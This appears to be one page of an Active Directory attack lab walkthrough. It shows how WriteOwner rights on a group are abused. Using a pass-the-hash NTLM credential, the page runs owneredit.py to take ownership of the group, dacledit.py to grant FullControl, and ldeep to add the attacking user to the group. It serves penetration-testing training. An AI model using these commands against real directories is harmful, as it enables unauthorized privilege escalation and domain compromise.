WriteOwner on Group (EmpireState -> CentralPark)
Now with the writeOwner privilege we can change the owner of CentralPark to own the group
Just like before we will use the impacket fork

ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 membersof 'CentralPark'
Read The Owner Permission
owneredit.py -action read -target 'CentralPark' -hashes ':b3b3717f7d51b37fb325f7e7d048e998' NewYork.local/Nicolas.Maduro
Edit The Owner Permission
We are going to give Nicolas maduro owner access to CentralPark Group!
owneredit.py -action write -owner 'Nicolas.Maduro' -target 'CentralPark' -hashes ':b3b3717f7d51b37fb325f7e7d048e998' NewYork.local/Nicolas.Maduro
And the owner of CentralPark group is now Nicolas.Maduro
As owner of the group we can now change the acl and give us GenericAll on the group
dacledit.py -action 'write' -rights 'FullControl' -principal Nicolas.Maduro -target 'CentralPark' 'NewYork.local'/'Nicolas.Maduro' -hashes ':b3b3717f7d51b37fb325f7e7d048e998'

With GenericAll now we can add Nicolas to the CentrlalPark group
ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 add_to_group "CN=Nicolas.Maduro,OU=SugarHill,DC=NewYork,DC=local" "CN=CentralPark,OU=WestSide,DC=NewYork,DC=local"
See Nicolas.Maduro is part of the group now!
ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 membersof 'CentralPark'

PreviousAddMember on Group (RadioCity -> EmpireState)NextGeneric all on user (CentralPark -> diego.Montenegro)
Last updated